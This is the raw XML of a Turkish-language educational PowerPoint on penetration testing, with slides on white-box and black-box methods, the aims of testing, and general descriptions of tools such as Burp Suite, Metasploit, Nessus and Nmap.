              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>azalmış</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olur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="2100" dirty="0">
              <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="502920" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>White Box:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2100" dirty="0" err="1">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Güv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>enlik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testi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ekibi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sistemin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kendisi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arka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planda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çalışan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ilave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teknolojiler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hakkında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> tam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bilgi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sahibidir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. Black Box </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tekniğine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göre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kurum</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firmaya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daha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büyük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fayda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sağlar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Hata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zafiyetleri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bulmak</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kolaylaşacağından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bunlara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tedbir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alınma</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süresi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>azalacaktır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Sistemin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zarar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görme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riski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çok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2100" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>azdır</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ve</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maliyet</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olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>en</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az</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maliyetli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>olandır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="411455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2BC6D9-6C3A-4AAD-B439-263CB0AC630F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1572780" y="229224"/>
            <a:ext cx="9084950" cy="898118"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Penetrasyon Testinin Amaçları</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="İçerik Yer Tutucusu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C162775E-12E8-4744-8B79-0D05DF1FBFA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1572780" y="1252604"/>
            <a:ext cx="9035044" cy="5035462"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Kurumun güvenlik politikalarının ve kontrollerinin verimliliğini test etmek ve denetlemek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Zafiyet ve açıklık taramasını içten ve dıştan derinlemesine uygulamak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Standartlara uyumluluk için veri toplayan denetleme ekiplerine kullanılabilir data sağlamak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Kurumun güvenlik kapasitesi hakkında kapsamlı ve ayrıntılı analiz sunarak güvenlik denetlemelerinin maliyetini düşürmek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Bilinen zafiyetlere uygun yamaların uygulanmasını sistematik bir hale getirmek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Kurumun ağ ve sistemlerinde mevcut olan risk ve tehditleri ortaya çıkarmak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Güvenlik duvarı, yönlendirici ve web sunucuları gibi ağ güvenlik cihazlarının verimliliğini değerlendirmek</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>- Gelecek saldırı, sızma ve istismar girişimlerini önlemek için alınabilecek aksiyonları belirleyen kapsamlı bir plan sunmak</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="tr-TR"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9381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265E17-4561-4CE9-9D18-D0429610C597}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1398739" y="585591"/>
            <a:ext cx="9394521" cy="5686817"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">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Mevcut yazılım-donanım veya ağ altyapısının bir değişiklik veya sürüm yükseltmeye ihtiyacı olup olmadığını belirlemek- Kurumun güvenlik politikalarının ve kontrollerinin verimliliğini test etmek ve denetlemek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Zafiyet ve açıklık taramasını içten ve dıştan derinlemesine uygulamak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Standartlara uyumluluk için veri toplayan denetleme ekiplerine kullanılabilir data sağlamak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Kurumun güvenlik kapasitesi hakkında kapsamlı ve ayrıntılı analiz sunarak güvenlik denetlemelerinin maliyetini düşürmek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Bilinen zafiyetlere uygun yamaların uygulanmasını sistematik bir hale getirmek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Kurumun ağ ve sistemlerinde mevcut olan risk ve tehditleri ortaya çıkarmak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Güvenlik duvarı, yönlendirici ve web sunucuları gibi ağ güvenlik cihazlarının verimliliğini değerlendirmek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Gelecek saldırı, sızma ve istismar girişimlerini önlemek için alınabilecek aksiyonları belirleyen kapsamlı bir plan sunmak</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>- Mevcut yazılım-donanım veya ağ altyapısının bir değişiklik veya sürüm yükseltmeye ihtiyacı olup olmadığını belirlemek</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3870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95A4A4B-7024-4817-A706-DEC14FC20E87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1616254" y="345249"/>
            <a:ext cx="9134856" cy="826717"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:br>
              <a:rPr lang="tr-TR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="tr-TR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="tr-TR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="tr-TR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Penetrasyon Testinde Kullanılan Popüler Araçlar</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="İçerik Yer Tutucusu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E03ADA94-3A07-41E4-BDF6-D91E513B1D44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1616254" y="1171966"/>
            <a:ext cx="9134856" cy="4514067"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="502920" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Burp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Suite: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Web tabanlı uygulamaların güvenliğini kontrol etmek için yaygın olarak kullanılan bir yardımcı programdır. Uygulamanın saldırı yüzeyini haritalama, tarayıcı ve hedef sunucular arasında oluşan istekleri ve yanıtları analiz etme ve web tabanlı uygulamaları otomatik olarak tarama gibi farklı güvenlik testlerini gerçekleştirmek için kullanılabilecek çeşitli araçlardan oluşur.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="502920" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Metasploit: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Çeşitli pentest araçlarının çok popüler bir koleksiyonudur. Siber güvenlik uzmanları ve BT uzmanları, güvenlik açıklarını keşfetmek, güvenlik değerlendirmelerini yönetmek ve savunma metodolojilerini formüle etmek için kullanırlar.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="tr-TR"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524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2A7163-1FC1-4DEC-AF89-4372B395E01C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1478269" y="960328"/>
            <a:ext cx="9235461" cy="4937344"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="502920" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bir bilgisayar sistemindeki veya ağdaki güvenlik açıklarını taramak için popüler bir araçtır. Kullanımı son derece kolaydır, hızlı ve doğru bir tarama sunar. Tanımladığı güvenlik açıklarından bazıları yanlış yapılandırma hataları, yanlış parolalar ve açık bağlantı noktalarıdır.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="502920" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Nmap: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sistemlerin veya ağların güvenlik açıklarını taramak için ücretsiz ve açık kaynak kodlu bir araçtır. Araç ayrıca, host veya servis çalışma süresinin izlenmesi ve ağ saldırı yüzeylerinin haritalandırılması gibi diğer aktiviteleri gerçekleştirmede de yardımcı olur. Nmap, tüm ana işletim sistemlerinde çalışır ve hem büyük hem de küçük ağları taramak için uygundur. Ağda bulunan ana bilgisayarlar, çalışan işletim sistemi türü, paket filtreleri ya da güvenlik duvarı türleri gibi herhangi bir hedef ağın çeşitli özelliklerini anlayabilirsiniz.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27480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kula dönüş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4352289_TF02895269" id="{38652497-0A46-4169-9E08-137D88467FD5}" vid="{F4EB4BDA-9798-40A1-AD41-3615AFCE58BF}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=ppt/theme/theme2.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Ofis Teması">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B5F5AFAE-B80F-42D3-94B4-729362BC1BCB}">
  <ds:schemaRef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40262f94-9f35-4ac3-9a90-690165a166b7"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/elements/1.1/"/>
    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/package/2006/metadata/core-properties"/>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Sonbahar eğlenceli eğitim sunusu (geniş ekran)</Template>
  <TotalTime>1322</TotalTime>
  <Words>938</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Geniş ekran</PresentationFormat>
  <Paragraphs>82</Paragraphs>
  <Slides>19</Slides>
  <Notes>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Cambria</vt:lpstr>
      <vt:lpstr>Segoe UI Semibold</vt:lpstr>
      <vt:lpstr>Okula dönüş 16x9</vt:lpstr>
      <vt:lpstr>PENETRASYON TESTİ</vt:lpstr>
      <vt:lpstr>İÇİNDEKİLER</vt:lpstr>
      <vt:lpstr>Penetrasyon (Sızma) Testi</vt:lpstr>
      <vt:lpstr>Penetrasyon Testi Çeşitleri</vt:lpstr>
      <vt:lpstr>Penetrasyon Testi Yöntemleri</vt:lpstr>
      <vt:lpstr>Penetrasyon Testinin Amaçları</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>   Penetrasyon Testinde Kullanılan Popüler Araçlar</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>Penetrasyon Testi Aşamaları</vt:lpstr>
      <vt:lpstr>PowerPoint Sunusu</vt:lpstr>
      <vt:lpstr>Penetrasyon Testi Uygulaması</vt:lpstr>
      <vt:lpstr>Metasploit Framework ile Bir Alıştırmanın Adımları</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PENETRASYON TESTİ</dc:title>
  <dc:creator>AYŞENUR BURAK</dc:creator>
  <cp:lastModifiedBy>AYŞENUR BURAK</cp:lastModifiedBy>
  <cp:revision>24</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-10-18T16:48:31Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-10-23T18:41:57Z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